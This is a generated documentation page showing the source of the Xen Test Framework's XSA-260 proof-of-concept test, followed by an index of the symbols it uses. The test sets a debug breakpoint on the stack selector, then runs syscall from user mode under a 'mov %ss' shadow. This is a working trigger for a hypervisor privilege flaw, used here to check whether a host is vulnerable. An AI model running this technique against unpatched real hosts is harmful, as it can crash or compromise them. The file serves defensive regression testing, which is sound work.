docs/xtf/xsa-260_2main_8c_source.html

#include <xtf.h>


const char test_title[] = "XSA-260 PoC";


static unsigned int __user_data user_ss = __USER_DS;


static void undo_stack(struct cpu_regs *regs)

{

    /* This had better be a user frame, so ->_sp is safe in 32bit builds. */

    if ( IS_DEFINED(CONFIG_32BIT) )

        ASSERT((regs->cs & 3) == 3);


    regs->_sp = regs->bx;

}


void do_syscall(struct cpu_regs *regs)

{

    printk("  Entered XTF via syscall\n");


    undo_stack(regs);


    if ( IS_DEFINED(CONFIG_32BIT) &&

         regs->cs == 0xe023 && regs->_ss == 0xe02b )

    {

        xtf_warning("Warning: Fixing up Xen's 32bit syscall selector bug\n");

        regs->cs  = __USER_CS;

        regs->_ss = __USER_DS;

    }

}


static bool ex_check_UD(struct cpu_regs *regs, const struct extable_entry *ex)

{

    if ( regs->entry_vector == X86_EXC_UD )

    {

        printk("  Hit #UD for syscall (not vulnerable)\n");


        undo_stack(regs);

        regs->ip = ex->fixup;


        return true;

    }


    return false;

}


static void __user_text user_syscall(void)

{

    asm volatile (/* Stash the stack pointer before clobbering it. */

                  "mov %%" _ASM_SP ", %%" _ASM_BX ";"


                  "btc $%c[bit], %%" _ASM_SP ";"

                  "mov %[ss], %%ss;"

                  "1: syscall; 2:"

                  _ASM_EXTABLE_HANDLER(1b, 2b, %P[hnd])

                  :

                  : [bit] "i" (BITS_PER_LONG - 1),

                    [ss]  "m" (user_ss),

                    [hnd] "p" (ex_check_UD)

#ifdef __x86_64__

                  : "rbx", "rcx", "r11"

#else

                  : "ebx", "ecx", "edx"

#endif

        );

}


static void __user_text user_syscall_compat(void)

{

    asm volatile (/* Stash the stack pointer before clobbering it. */

                  "mov %%" _ASM_SP ", %%" _ASM_BX ";"


                  /* Drop to a 32bit compat code segment. */

                  "push $%c[cs32];"

                  "push $1f;"

                  "lretq; 1:"

                  ".code32;"


                  /* Invert the top bit of the stack pointer. */

                  "btc $31, %%esp;"


                  /*

                   * Launch the attack.  Manually encode the memory reference

                   * to prevent the toolchain trying to write out a

                   * rip-relative reference in 32bit code.

                   */

                  "mov (%k[ss_ptr]), %%ss;"

                  "1: syscall; 2:"

                  _ASM_EXTABLE_HANDLER(1b, 2b, %P[hnd])


                  /* Return to 64bit mode. */

                  "ljmpl $%c[cs64], $1f; 1:"

                  ".code64;"

                  :

                  : [cs32]   "i" (__USER_CS32),

                    [ss_ptr] "R" (&user_ss),

                    [cs64]   "i" (__USER_CS),

                    [hnd] "p" (ex_check_UD)

#ifdef __x86_64__

                  : "rbx", "rcx", "r11"

#else

                  : "ebx", "ecx", "edx"

#endif

        );

}


void test_main(void)

{

    unsigned int ss = read_ss();


    write_dr0(_u(&ss));


    unsigned long dr7 = DR7_SYM(0, L, G, RW, 32) | X86_DR7_LE | X86_DR7_GE;


    /* Double %dr7 write to work around Xen's latching bug. */

    write_dr7(dr7);

    write_dr7(dr7);


    exinfo_t fault = 0, exp = EXINFO_SYM(DB, 0);


    /* Sanity check that breakpoints are working. */

    asm volatile ("mov %[ss], %%ss; nop; 1:"

                  _ASM_EXTABLE_HANDLER(1b, 1b, %P[rec])

                  : "+a" (fault)

                  : [ss] "m" (ss), [rec] "p" (ex_record_fault_eax));


    if ( fault != exp )

        return xtf_error("Error checking breakpoint\n"

                         "  Expected %#x %pe, got %#x %pe\n",

                         exp, _p(exp), fault, _p(fault));


    /* Prime the user code for its exploit attempt. */

    write_dr0(_u(&user_ss));


    printk("Testing native syscall\n");

    exec_user_void(user_syscall);


    /* For 64bit guests, try a compat syscall as well. */

    if ( IS_DEFINED(CONFIG_64BIT) )

    {

        printk("Testing compat syscall\n");

        exec_user_void(user_syscall_compat);

    }


    write_dr7(0);


    xtf_success("Success: Not vulnerable to XSA-260\n");

}


/*

 * Local variables:

 * mode: C

 * c-file-style: "BSD"

 * c-basic-offset: 4

 * tab-width: 4

 * indent-tabs-mode: nil

 * End:

 */

ex_record_fault_eax
bool ex_record_fault_eax(struct cpu_regs *regs, const struct extable_entry *ex)
Record the current fault in %eax.
Definition: extable.c:8

_ASM_SP
#define _ASM_SP
Definition: asm_macros.h:37

_ASM_BX
#define _ASM_BX
Definition: asm_macros.h:36

read_ss
static unsigned int read_ss(void)
Definition: lib.h:169

__user_text
#define __user_text
Definition: compiler.h:33

__user_data
#define __user_data
Definition: compiler.h:34

printk
void printk(const char *fmt,...)
Definition: console.c:134

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110

test_title
const char test_title[]
The title of the test.
Definition: main.c:24

EXINFO_SYM
#define EXINFO_SYM(exc, ec)
Definition: exinfo.h:29

exinfo_t
unsigned int exinfo_t
Packed exception and error code information.
Definition: exinfo.h:19

_ASM_EXTABLE_HANDLER
#define _ASM_EXTABLE_HANDLER(fault, fixup, handler)
Create an exception table entry with custom handler.
Definition: extable.h:38

ASSERT
#define ASSERT(cond)
Definition: lib.h:14

exec_user_void
static void exec_user_void(void(*fn)(void))
Definition: lib.h:70

BITS_PER_LONG
#define BITS_PER_LONG
Definition: limits.h:12

IS_DEFINED
#define IS_DEFINED(x)
Evalute whether the CONFIG_ token x is defined.
Definition: macro_magic.h:67

_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48

_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53

X86_EXC_UD
#define X86_EXC_UD
Definition: processor.h:108

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

xtf_warning
void xtf_warning(const char *fmt,...)
Report a test warning.
Definition: report.c:52

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

extable_entry
Exception table entry.
Definition: extable.h:65

extable_entry::fixup
unsigned long fixup
Fixup address.
Definition: extable.h:67

write_dr0
static void write_dr0(unsigned long linear)
Definition: x86-dbg-reg.h:111

DR7_SYM
#define DR7_SYM(bp,...)
Create a partial %dr7 setting for a particular breakpoint based on mnemonics.
Definition: x86-dbg-reg.h:100

X86_DR7_LE
#define X86_DR7_LE
Definition: x86-dbg-reg.h:29

X86_DR7_GE
#define X86_DR7_GE
Definition: x86-dbg-reg.h:30

write_dr7
static void write_dr7(unsigned long val)
Definition: x86-dbg-reg.h:181

ex_check_UD
static bool ex_check_UD(struct cpu_regs *regs, const struct extable_entry *ex)
Definition: main.c:64

do_syscall
void do_syscall(struct cpu_regs *regs)
May be implemented by a guest to handle SYSCALL invocations.
Definition: main.c:49

user_ss
static unsigned int user_ss
Definition: main.c:38

user_syscall
static void user_syscall(void)
Definition: main.c:79

user_syscall_compat
static void user_syscall_compat(void)
Definition: main.c:100

undo_stack
static void undo_stack(struct cpu_regs *regs)
Definition: main.c:40